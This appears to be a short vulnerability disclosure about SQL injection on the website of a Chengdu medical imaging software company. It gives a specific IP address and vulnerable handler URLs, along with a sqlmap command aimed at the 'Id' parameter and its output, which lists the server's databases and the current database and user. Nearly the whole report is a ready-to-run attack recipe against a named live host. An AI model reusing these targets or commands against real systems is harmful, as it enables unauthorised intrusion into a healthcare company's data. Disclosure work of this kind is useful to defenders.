Multiple SQL injection vulnerabilities on ruiming medical master site cause Sensitive Information Leakage

Multiple SQL injection vulnerabilities on ruiming medical master site cause Sensitive Information Leakage

RT

Chengdu ruiming Medical Information Technology Co., Ltd. is a high-tech enterprise dedicated to researching, developing, producing and selling PACS/RIS/HIS medical imaging information system products in the medical information field. The company's main R & D personnel have profound medical imaging research background, strong technical accumulation, early in the medical imaging processing, 3D reconstruction, breast CAD, pulmonary nodules detection, other computer-aided diagnosis and other major technical reserves are ......
 

http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134

 

 

 

python sqlmap.py -u "http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134" -p Id --dbsavailable databases [9]:[*] master[*] model[*] msdb[*] newMedicinePlatform[*] ReportServer[*] ReportServerTempDB[*] RMFitness[*] RmmitData[*] tempdb

 

[19:53:53] [INFO] fetching current databasecurrent database:    'RmmitData'[19:53:53] [INFO] testing if current user is DBAcurrent user is DBA:    False[19:53:53] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[19:53:53] [INFO] fetched data logged to text files under '/Users/Apple/.sqlmap/output/123.56.113.223'

 

 

http://123.56.113.223:8081/Handler/Paging.ashx?pageIndex=1&type=Working&d=73